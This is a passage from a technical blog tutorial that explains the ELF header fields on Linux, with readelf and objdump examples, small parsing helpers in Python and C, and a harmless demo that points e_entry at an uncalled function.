<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxk8ni07z0dQIKwPES6ZzZQ8nfoVQvVNUkwYnGKeLfHDQjk0BfGftc8D3f4Uu4MpTqW_ubx_JwNHPRrPyD16vmdyseV_M1Mm3QslHuGujrqc-wqz02bbqz6gMyTVZZtvDnsSVpz8h7mY/s1600/Screenshot+from+2018-09-13+23-45-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="652" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHxk8ni07z0dQIKwPES6ZzZQ8nfoVQvVNUkwYnGKeLfHDQjk0BfGftc8D3f4Uu4MpTqW_ubx_JwNHPRrPyD16vmdyseV_M1Mm3QslHuGujrqc-wqz02bbqz6gMyTVZZtvDnsSVpz8h7mY/s1600/Screenshot+from+2018-09-13+23-45-24.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
And that's it for this one! I'm sure you folks can figure out more interesting games to play with the program headers. In the next post I'm going to start covering the section headers. Stay tuned!</div>
<div>
<br /></div>
<br />
References and Reading:<br />
<br />
<ul style="text-align: left;">
<li><a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format </a></li>
</ul>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-45100149095218650242018-09-12T23:01:00.000-07:002018-09-12T23:17:29.939-07:00Introduction to the ELF Format : The ELF Header (Part I)<div dir="ltr" style="text-align: left;" trbidi="on">
ELF files are charged with using their magic to perform two holy tasks in the Linux universe. The first is telling the kernel where to place stuff from the ELF file on disk in memory, as well as providing ways to invoke the dynamic loader's functions. The second is telling the plethora of tools that interpret the file where the data structures are that hold useful information for making sense of it (maybe even some debugging information). Anyway, that's as far as I've figured it out; the actual breakdown is a little less simple.<br />
<br />
<br />
I'll demonstrate why this is so here and over the next series of posts in the classic "Learn things by breaking them" style.<br />
<h2 style="text-align: left;">
ELF Header and Identification fields</h2>
The first thing that appears in an ELF file is of course the header, which, like most headers in file formats, is largely a list of offsets into the file. Its purpose is to indicate what kind of ELF this is and where the various interpreters of the file can find the good stuff.<br />
<br />
Here's what the header looks like (I've included a sample here, you can grab any ELF file on the system):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBNWD1SC4eEnayIGrzDjpw0zPI5wMPvCMRNuN1TzMKwzQDUnhzU4GbPnfCCnaOU_hphTxh7U_Uya1m2P-EXhYHTXf4BJYTgExo4kfUbFB7w_jH8CzR36xehMoNMW3Y16nHNjI31IOcFw/s1600/Screenshot+from+2018-09-12+00-43-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="584" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBNWD1SC4eEnayIGrzDjpw0zPI5wMPvCMRNuN1TzMKwzQDUnhzU4GbPnfCCnaOU_hphTxh7U_Uya1m2P-EXhYHTXf4BJYTgExo4kfUbFB7w_jH8CzR36xehMoNMW3Y16nHNjI31IOcFw/s1600/Screenshot+from+2018-09-12+00-43-40.png" /></a></div>
<br />
If you're not super used to the Linux world, please don't read too much into the .elf extension on my file; ELF files normally don't have extensions in their file names.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxvjXP5fmdb5hTr8TlLvDX2bkpBXpVC7rdhOWyAneRNy3pvKgAMQQkPeTEQsrMz7GJvx5QXxF-vjGKyzaYue-t2kcjjseFZXB9XnW6hq8MZ_hYlh_izw8EKJdzK-pRgBxUlQ-gvWNT7E/s1600/Screenshot+from+2018-09-12+00-43-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="648" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxvjXP5fmdb5hTr8TlLvDX2bkpBXpVC7rdhOWyAneRNy3pvKgAMQQkPeTEQsrMz7GJvx5QXxF-vjGKyzaYue-t2kcjjseFZXB9XnW6hq8MZ_hYlh_izw8EKJdzK-pRgBxUlQ-gvWNT7E/s400/Screenshot+from+2018-09-12+00-43-51.png" width="355" /></a></div>
<br />
<br />
The first field is called the ELF Identification. The ELF format is pretty flexible: the same format works across a ton of different architectures, with support for multiple encodings and Application Binary Interfaces. Here's the breakdown of how the <span style="font-family: "courier new" , "courier" , monospace;">EI_IDENT</span> field works:<br />
<br />
<ul style="text-align: left;">
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x00 - 0x03</span> <span style="font-family: "courier new" , "courier" , monospace;">EI_MAG0 ... EI_MAG3 </span>The first four bytes of every ELF file are the magic number: <span style="font-family: "courier new" , "courier" , monospace;">0x7f</span> followed by the ASCII codes for<span style="font-family: "courier new" , "courier" , monospace;"> 'E' 'L' 'F'</span>.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x04 EI_CLASS</span> tells us whether the file is 32 or 64 bit. The standard says <span style="font-family: "courier new" , "courier" , monospace;">0x1</span> means 32 bit and <span style="font-family: "courier new" , "courier" , monospace;">0x2</span> means 64 bit. </li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x05 EI_DATA</span> defines the endianness of the file: <span style="font-family: "courier new" , "courier" , monospace;">0x01</span> means little endian and <span style="font-family: "courier new" , "courier" , monospace;">0x02</span> means big endian.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x06 EI_VERSION</span> shows the version of the ELF file; most should be set to <span style="font-family: "courier new" , "courier" , monospace;">0x1</span> for version 1.</li>
<li>Offset <span style="font-family: "courier new" , "courier" , monospace;">0x07 EI_OSABI </span>identifies the OS or Application Binary Interface (ABI) extensions the file targets. Please bear in mind the documentation is a bit flaky here, and the meaning may depend heavily on the particular OSABI involved. </li>
</ul>
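Here's a minimal Python sketch of decoding those identification bytes. The helper name and dictionary keys are my own, and it only decodes the fields listed above (the full e_ident array is 16 bytes long).

```python
ELFCLASS = {1: "ELF32", 2: "ELF64"}
ELFDATA = {1: "little endian", 2: "big endian"}

def parse_e_ident(elf: bytes) -> dict:
    """Decode the identification bytes at the start of an ELF file."""
    if len(elf) < 16:
        raise ValueError("e_ident is 16 bytes long; input is too short")
    if elf[0:4] != b"\x7fELF":  # EI_MAG0 .. EI_MAG3
        raise ValueError("bad magic")
    return {
        "class": ELFCLASS.get(elf[4], f"invalid ({elf[4]})"),  # EI_CLASS
        "data": ELFDATA.get(elf[5], f"invalid ({elf[5]})"),    # EI_DATA
        "version": elf[6],                                      # EI_VERSION
        "osabi": elf[7],                                        # EI_OSABI
    }
```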
<br />
One can see what the <span style="font-family: "courier new" , "courier" , monospace;">EI_IDENT</span> field says by looking at the output of <span style="font-family: "courier new" , "courier" , monospace;">readelf -h</span>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwW__3wz49B8yuZzpL5Bj3c2FfHc04PArHtGOScQISk8Gww59VjTzQ87jAJ6NbygiYQfOOkugO3Eh-zNOBHm7jnpaiUOMvdZigks1lLpesVRmpF7ntZLkDaYPow7o1TLAAncP5JZSdyu4/s1600/Screenshot+from+2018-09-12+19-37-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="1352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwW__3wz49B8yuZzpL5Bj3c2FfHc04PArHtGOScQISk8Gww59VjTzQ87jAJ6NbygiYQfOOkugO3Eh-zNOBHm7jnpaiUOMvdZigks1lLpesVRmpF7ntZLkDaYPow7o1TLAAncP5JZSdyu4/s1600/Screenshot+from+2018-09-12+19-37-29.png" /></a></div>
<br />
Pretty interesting stuff!<br />
<br />
Let's see what happens when we change the value of the ELF version number: pop open <span style="font-family: "courier new" , "courier" , monospace;">hexedit</span>, change offset <span style="font-family: "courier new" , "courier" , monospace;">0x06</span> in the file to whatever you want, then run <span style="font-family: "courier new" , "courier" , monospace;">readelf -h</span> on it. Here's what happens when I do this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3JZEN-wgBRbeCNYJkEbafL9ZuNM9f_LcTZgXRBJDolCVck5GL6TTfjwOQ3nXAxS7J-UrNPJrySIPujJbLpMN_Grwo4DcuF_d2FBsCUcf0FLx2AJ-SOlki6LkN68Fc66mw4hjkRM9OsU/s1600/Screenshot+from+2018-09-12+19-56-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="113" data-original-width="935" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX3JZEN-wgBRbeCNYJkEbafL9ZuNM9f_LcTZgXRBJDolCVck5GL6TTfjwOQ3nXAxS7J-UrNPJrySIPujJbLpMN_Grwo4DcuF_d2FBsCUcf0FLx2AJ-SOlki6LkN68Fc66mw4hjkRM9OsU/s1600/Screenshot+from+2018-09-12+19-56-19.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BYS1ny7E_FxcUetuJ3neRyJYL5P7ckY8IBvYp4bnPexOrFYTnfFg9yT5MU-90XKxIHys4IEA0xlFqEruuPicwT3TMyn2cBa6y6z1cW_ncwxAR6eQdlGH4kA2npKqF9C9ToxLYJcpP9k/s1600/Screenshot+from+2018-09-12+19-56-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="234" data-original-width="1230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7BYS1ny7E_FxcUetuJ3neRyJYL5P7ckY8IBvYp4bnPexOrFYTnfFg9yT5MU-90XKxIHys4IEA0xlFqEruuPicwT3TMyn2cBa6y6z1cW_ncwxAR6eQdlGH4kA2npKqF9C9ToxLYJcpP9k/s1600/Screenshot+from+2018-09-12+19-56-44.png" /></a></div>
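Instead of hexedit, a tiny Python helper can produce the modified copy. The name with_ei_version is hypothetical; it simply returns the file's bytes with offset 0x06 replaced and everything else untouched.

```python
EI_VERSION = 6  # offset of the version byte inside e_ident

def with_ei_version(elf: bytes, value: int) -> bytes:
    """Return a copy of an ELF image with the EI_VERSION byte replaced."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    patched = bytearray(elf)
    patched[EI_VERSION] = value  # bytearray raises ValueError outside 0..255
    return bytes(patched)
```

For example, write with_ei_version(open("compile.elf", "rb").read(), 0x41) out to a new file and run readelf -h on that.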
<br />
<br />
<h2 style="text-align: left;">
ELF Type, Machine and Version Fields</h2>
<br />
The next field after <span style="font-family: "courier new" , "courier" , monospace;">e_ident</span> is <span style="font-family: "courier new" , "courier" , monospace;">e_type</span>. The example above has the type <span style="font-family: "courier new" , "courier" , monospace;">EXEC</span> (since it reads <span style="font-family: "courier new" , "courier" , monospace;">0x02 0x00</span>, which is 2 in little endian), which according to the ELF standard means it's an executable file (<i>checking the standard will confirm this</i>).<br />
<br />
Let's dump the header of something that is probably a shared object and compare the <span style="font-family: "courier new" , "courier" , monospace;">e_type</span> field, for instance. Here's the header for libvlc:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicavZpg08-PcBmSWNQPq6H-X3S_k1EjdgY_-5DVBvsawc8tByLnBbSFlKp_-PA2bWuX31dGjXAh0-AP1xrsSFpPQnwpaWgBSHbQ5ZkD7VjoXt4Q-HPDhSlpXt0_6jv65vrfr84K7CA-AI/s1600/Screenshot+from+2018-09-12+00-47-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicavZpg08-PcBmSWNQPq6H-X3S_k1EjdgY_-5DVBvsawc8tByLnBbSFlKp_-PA2bWuX31dGjXAh0-AP1xrsSFpPQnwpaWgBSHbQ5ZkD7VjoXt4Q-HPDhSlpXt0_6jv65vrfr84K7CA-AI/s1600/Screenshot+from+2018-09-12+00-47-36.png" /></a></div>
<br />
<br />
Yup, looks like the byte offsets agree!<br />
<br />
This one has the <span style="font-family: "courier new" , "courier" , monospace;">e_type</span> field set to the bytes<span style="font-family: "courier new" , "courier" , monospace;"> 0x03 0x00</span> at offset <span style="font-family: "courier new" , "courier" , monospace;">0x10</span> in the file header, which means its ELF type is <span style="font-family: "courier new" , "courier" , monospace;">DYN</span>, i.e. a shared object (note that position-independent executables use <span style="font-family: "courier new" , "courier" , monospace;">DYN</span> as well). And here's readelf confirming this information:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hY6PEYIK1b1zjtibkPcQz9ws6TmlSHbbTpj6ki7yAUSqK-5XHPvRmmmAu28wf_iIubNDdQcQce_pbQHCnhMjGTn4y8RHElM_l9nsFpIJv6QVAQa_D1BH8RpPxMiKU-RS_lIyn0ezUwk/s1600/Screenshot+from+2018-09-12+00-52-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="408" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1hY6PEYIK1b1zjtibkPcQz9ws6TmlSHbbTpj6ki7yAUSqK-5XHPvRmmmAu28wf_iIubNDdQcQce_pbQHCnhMjGTn4y8RHElM_l9nsFpIJv6QVAQa_D1BH8RpPxMiKU-RS_lIyn0ezUwk/s1600/Screenshot+from+2018-09-12+00-52-12.png" /></a></div>
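Reading e_type yourself only takes a couple of lines. In this sketch (my own helper), the 2-byte field at offset 0x10 is decoded with the endianness given by EI_DATA, and the names follow the standard ET_* values.

```python
import struct

ET_NAMES = {0: "NONE", 1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}

def elf_type(elf: bytes) -> str:
    """Read the 2-byte e_type at offset 0x10, honouring EI_DATA endianness."""
    if elf[5] not in (1, 2):
        raise ValueError("EI_DATA must be 1 (little endian) or 2 (big endian)")
    order = "<" if elf[5] == 1 else ">"
    (e_type,) = struct.unpack_from(order + "H", elf, 0x10)
    return ET_NAMES.get(e_type, f"unknown ({e_type:#06x})")
```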
<br />
<br />
After the type field we find the <span style="font-family: "courier new" , "courier" , monospace;">e_machine</span> field, which indicates the architecture this file is meant for. Again, ELF supports a number of architectures, so there's a range of values this can take. It might be a good idea to fiddle with this field and see what happens.<br />
Here are some examples I found that don't appear in the usual documentation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWBSZIwGMfu3xtlcoXyZuYR89gjf_NEMtoAW_cjQ9AevgjAjms3AF967HHyyOIe-Pua2__qYcrd5hmZBJLNcS5y5bC8OnMUBZyl3iVfzB7TUWjL2CPimnyp45XJYdF0wNFP16b6kWAvaM/s1600/Screenshot+from+2018-09-12+20-09-39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="134" data-original-width="1509" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWBSZIwGMfu3xtlcoXyZuYR89gjf_NEMtoAW_cjQ9AevgjAjms3AF967HHyyOIe-Pua2__qYcrd5hmZBJLNcS5y5bC8OnMUBZyl3iVfzB7TUWjL2CPimnyp45XJYdF0wNFP16b6kWAvaM/s1600/Screenshot+from+2018-09-12+20-09-39.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0l_lOwRS7_YRIGji5TBFjf1pCFfMUzWCkDgC1ns7o-J-PUQkyiXolBbckZsrU_cQyIAKHriHhUFc2i0Fx73nCeaxpWsniyS9OK9f-OfxDf45dtnZzEGQgH9ADVT-EBA1sxzTJ80HyirI/s1600/Screenshot+from+2018-09-12+20-09-10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="171" data-original-width="1204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0l_lOwRS7_YRIGji5TBFjf1pCFfMUzWCkDgC1ns7o-J-PUQkyiXolBbckZsrU_cQyIAKHriHhUFc2i0Fx73nCeaxpWsniyS9OK9f-OfxDf45dtnZzEGQgH9ADVT-EBA1sxzTJ80HyirI/s1600/Screenshot+from+2018-09-12+20-09-10.png" /></a></div>
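To get a feel for how a tool turns this field into a name, here is a small lookup sketch in C. It covers only a handful of values from the ELF specification (they correspond to EM_386, EM_ARM, EM_X86_64, EM_AARCH64 and EM_RISCV in glibc's elf.h); the function names and the human-readable labels are my own, and a little-endian file is assumed.

```c
#include <stdint.h>

/* e_machine is the 16-bit field right after e_type, at offset 0x12.
 * Assumes a little-endian file and a buffer of at least 0x14 bytes. */
uint16_t elf_machine(const unsigned char *hdr)
{
    return (uint16_t)(hdr[0x12] | (hdr[0x13] << 8));
}

/* A few common e_machine values; everything else is reported as unknown. */
const char *elf_machine_name(uint16_t machine)
{
    switch (machine) {
    case 3:   return "Intel 80386";  /* EM_386 */
    case 40:  return "ARM";          /* EM_ARM, 32-bit */
    case 62:  return "AMD x86-64";   /* EM_X86_64 */
    case 183: return "AArch64";      /* EM_AARCH64 */
    case 243: return "RISC-V";       /* EM_RISCV */
    default:  return "unknown";
    }
}
```

Writing an arbitrary value such as 0xBEEF into offset 0x12 is an easy way to see how your own tools handle machine types they don't recognise.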
<br />
<br />
It's always good to throw a couple of bytes at the format and see what it really does! Moving on, the next field is <span style="font-family: "courier new" , "courier" , monospace;">e_version</span> (offset <span style="font-family: "courier new" , "courier" , monospace;">0x14</span>), which holds the ELF version number and should match the version byte (<span style="font-family: "courier new" , "courier" , monospace;">EI_VERSION</span>) in the <span style="font-family: "courier new" , "courier" , monospace;">e_ident</span> array. You can set this to pretty much anything and the binary should still run:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIuXZCOmQhvjdUim2ddtCGNFK3TBuifgXrHKR3ACOG-YAjjkX0o3kVzEHSqiryNIPpeu113jLPJtBADrLeunnXYCuf-jrcPgP3pnEjL0zkuyea8EulqLsuJjfjnlg2jZT-CM7qfLk-UY/s1600/Screenshot+from+2018-09-12+20-15-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="194" data-original-width="1265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicIuXZCOmQhvjdUim2ddtCGNFK3TBuifgXrHKR3ACOG-YAjjkX0o3kVzEHSqiryNIPpeu113jLPJtBADrLeunnXYCuf-jrcPgP3pnEjL0zkuyea8EulqLsuJjfjnlg2jZT-CM7qfLk-UY/s1600/Screenshot+from+2018-09-12+20-15-27.png" /></a></div>
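If you want to know whether a header you've been fiddling with is still consistent with the spec, a check like the one below compares the two version fields. It is a hypothetical helper, not something the loader runs (as noted above, the binary may still run when it fails), and it assumes a little-endian file; the only version the ELF specification defines is EV_CURRENT = 1.

```c
#include <stddef.h>
#include <stdint.h>

#define EI_VERSION_IDX 6   /* index of the version byte inside e_ident */
#define EV_CURRENT_VAL 1   /* EV_CURRENT, the only defined ELF version */

/* Returns 1 if e_ident[EI_VERSION] and the 32-bit e_version field at 0x14
 * both hold EV_CURRENT, 0 otherwise (including for a too-short buffer). */
int elf_version_ok(const unsigned char *hdr, size_t len)
{
    if (len < 0x18)
        return 0;
    uint32_t e_version = (uint32_t)hdr[0x14]
                       | (uint32_t)hdr[0x15] << 8
                       | (uint32_t)hdr[0x16] << 16
                       | (uint32_t)hdr[0x17] << 24;
    return hdr[EI_VERSION_IDX] == EV_CURRENT_VAL && e_version == EV_CURRENT_VAL;
}
```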
<br />
<br />
The next field is one of the most important so I thought I would pop it in its own section and show you how to fiddle with it in a way that confirms its behavior.<br />
<h2 style="text-align: left;">
The e_entry field</h2>
The <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> field holds the virtual address (not the file offset) at which the program should start executing. Normally it points to your <span style="font-family: "courier new" , "courier" , monospace;">_start</span> routine, assuming you compiled with the usual toolchain defaults. You can point <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> anywhere you like; as an example, I'm going to show that you can call a function that would otherwise never run under normal execution. To start, here's the C program and the Makefile I'm using:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUET61aW6uF-2pZQS5N7FvrBm7R_mIEwPvqmsAijGLK4FkTeZ4xtzk4LQoP1VyrtcRzwdD_D50b2JgJSoshgJ5ea1SiRG1_oPz32KH5IaraW6v6yI5CqgN977R-dlj4tsLLSPJMyvOZaI/s1600/Screenshot+from+2018-09-12+22-42-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUET61aW6uF-2pZQS5N7FvrBm7R_mIEwPvqmsAijGLK4FkTeZ4xtzk4LQoP1VyrtcRzwdD_D50b2JgJSoshgJ5ea1SiRG1_oPz32KH5IaraW6v6yI5CqgN977R-dlj4tsLLSPJMyvOZaI/s1600/Screenshot+from+2018-09-12+22-42-19.png" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvG5I5wSnzcH0b2OP2b6VVVsZgU5MchgmvdXHRCIvuoLYrtUVv6ygL0iFJ0htlfIbY-0nD6HJ07pcWSfgw6nYHn3gT9HhqTelVDJ_exn4eu93MJO3RgWZ9VTEbTbgcUSmQ7FPMEwpkpk/s1600/Screenshot+from+2018-09-12+22-42-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="904" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwvG5I5wSnzcH0b2OP2b6VVVsZgU5MchgmvdXHRCIvuoLYrtUVv6ygL0iFJ0htlfIbY-0nD6HJ07pcWSfgw6nYHn3gT9HhqTelVDJ_exn4eu93MJO3RgWZ9VTEbTbgcUSmQ7FPMEwpkpk/s1600/Screenshot+from+2018-09-12+22-42-30.png" /></a></div>
<br />
<br />
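As you can see, <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> is never called from <span style="font-family: "courier new" , "courier" , monospace;">main</span>. When you run the program, the following happens:<br />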
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGdhn7KIULGuS8knRdTIoUgVULMal74bn8MogidRj_-YjY_JvRKh2Gob6LBNKtBAOEBx9IparCSjhvKMmEOH5xSHrYLHZsUg7MGqXsankhjdhxkDVbc0RtWyRWe9jaU3D6ZphIpay3-k/s1600/Screenshot+from+2018-09-12+22-42-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="78" data-original-width="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGdhn7KIULGuS8knRdTIoUgVULMal74bn8MogidRj_-YjY_JvRKh2Gob6LBNKtBAOEBx9IparCSjhvKMmEOH5xSHrYLHZsUg7MGqXsankhjdhxkDVbc0RtWyRWe9jaU3D6ZphIpay3-k/s1600/Screenshot+from+2018-09-12+22-42-51.png" /></a></div>
<br />
Now let's see if we can make <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> point to the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> function. To do that we need to get the following done:<br />
<br />
<ol style="text-align: left;">
<li>Look up the virtual address of the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> function with objdump</li>
<li>Stick the virtual address in the <span style="font-family: "courier new" , "courier" , monospace;">e_entry</span> field</li>
<li>Run the binary and confirm the output</li>
</ol>
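Step 2 can be done with a hex editor, or with a few lines of C. The sketch below assumes a 64-bit little-endian ELF file (e_entry sits at offset 0x18 in both ELF32 and ELF64, but is 8 bytes wide only in ELF64); set_entry64 is a hypothetical helper, not an existing tool.

```c
#include <stdint.h>
#include <stdio.h>

/* Overwrite e_entry (offset 0x18) in a 64-bit little-endian ELF file.
 * Returns 0 on success, -1 on any error. */
int set_entry64(const char *path, uint64_t entry)
{
    unsigned char ident[16];
    unsigned char bytes[8];
    FILE *f = fopen(path, "r+b");
    if (f == NULL)
        return -1;

    /* Check the magic, EI_CLASS == 2 (64-bit) and EI_DATA == 1 (little-endian). */
    if (fread(ident, 1, sizeof ident, f) != sizeof ident ||
        ident[0] != 0x7f || ident[1] != 'E' || ident[2] != 'L' || ident[3] != 'F' ||
        ident[4] != 2 || ident[5] != 1) {
        fclose(f);
        return -1;
    }

    /* Serialise the new entry point least-significant byte first. */
    for (int i = 0; i < 8; i++)
        bytes[i] = (unsigned char)(entry >> (8 * i));

    /* A seek is required between reading and writing on the same stream. */
    if (fseek(f, 0x18, SEEK_SET) != 0 ||
        fwrite(bytes, 1, sizeof bytes, f) != sizeof bytes) {
        fclose(f);
        return -1;
    }
    return fclose(f) == 0 ? 0 : -1;
}
```

Usage would look like set_entry64("compile_me.elf", 0x400526) with the address objdump reports. Keep in mind that a function used as the entry point has no caller to return to (on x86-64 Linux the stack holds argc where a return address would be), so it is safest for such a function to finish by calling exit() itself.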
<div>
Here's how you look up the address of the <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> function. Run <span style="font-family: "courier new" , "courier" , monospace;">objdump -D compile_me.elf</span> and look for the never_call function. Alternatively you could try <span style="font-family: "courier new" , "courier" , monospace;">objdump -D compile_me.elf | grep never_call</span>. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnsKlVz9RJwyHl58GqF7aQwIYJeTaXRtnALA4RgNZrb2acYta0Hc4716sO4bRDoSB5KX8XyXXa3ybgXvedp03Z75m-rt0N8RZNCpfpupT_boRSB9y3E3sbbD_K5uhjZaGVv9oC5Nk1-K8/s1600/Screenshot+from+2018-09-12+22-33-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnsKlVz9RJwyHl58GqF7aQwIYJeTaXRtnALA4RgNZrb2acYta0Hc4716sO4bRDoSB5KX8XyXXa3ybgXvedp03Z75m-rt0N8RZNCpfpupT_boRSB9y3E3sbbD_K5uhjZaGVv9oC5Nk1-K8/s1600/Screenshot+from+2018-09-12+22-33-52.png" /></a></div>
<div>
<br /></div>
<div>
In my example, <span style="font-family: "courier new" , "courier" , monospace;">never_call</span> is at address <span style="font-family: "courier new" , "courier" , monospace;">0x400526</span>. </div>
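Because e_entry holds a virtual address, 0x400526 is not where never_call's bytes sit in the file. The loader maps PT_LOAD segments, and you can translate between the two with the segment's p_vaddr and p_offset. The sketch assumes a typical non-PIE x86-64 layout where the text segment starts at virtual address 0x400000 with file offset 0 (check readelf -l on your own binary); struct load_seg and vaddr_to_offset are hypothetical names.

```c
#include <stdint.h>

/* One PT_LOAD program header, reduced to the fields needed here. */
struct load_seg {
    uint64_t p_offset;  /* where the segment starts in the file */
    uint64_t p_vaddr;   /* where it is mapped in memory */
    uint64_t p_filesz;  /* how many bytes are backed by the file */
};

/* Translate a virtual address (such as e_entry) to a file offset.
 * Returns 0 and sets *off on success, -1 if no segment covers vaddr. */
int vaddr_to_offset(const struct load_seg *segs, int n, uint64_t vaddr, uint64_t *off)
{
    for (int i = 0; i < n; i++) {
        if (vaddr >= segs[i].p_vaddr && vaddr - segs[i].p_vaddr < segs[i].p_filesz) {
            *off = vaddr - segs[i].p_vaddr + segs[i].p_offset;
            return 0;
        }
    }
    return -1;
}
```

Under that assumed layout, 0x400526 maps to file offset 0x526.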
<div>
If you've injected the address correctly <span style="font-family: "courier new" , "courier" , monospace;">readelf -h ./compile_me.elf </span>should show the following:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaT-0lZw_TI9WDkecHlllacJ33L5GH6svjZv5sYCGy6KgyM0k43w4Vf7hqCFWGVMRDxiW1SpNrhLpLRl8Agh74_yseNHqo6CFLePJWWvmSF6iTAOwwo8170dkKl_2VeIWlOL0rXuiIq0c/s1600/Screenshot+from+2018-09-12+22-34-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="536" data-original-width="1270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaT-0lZw_TI9WDkecHlllacJ33L5GH6svjZv5sYCGy6KgyM0k43w4Vf7hqCFWGVMRDxiW1SpNrhLpLRl8Agh74_yseNHqo6CFLePJWWvmSF6iTAOwwo8170dkKl_2VeIWlOL0rXuiIq0c/s1600/Screenshot+from+2018-09-12+22-34-21.png" /></a></div>
<div>
<br /></div>
<div>
and when you run it you should see...</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
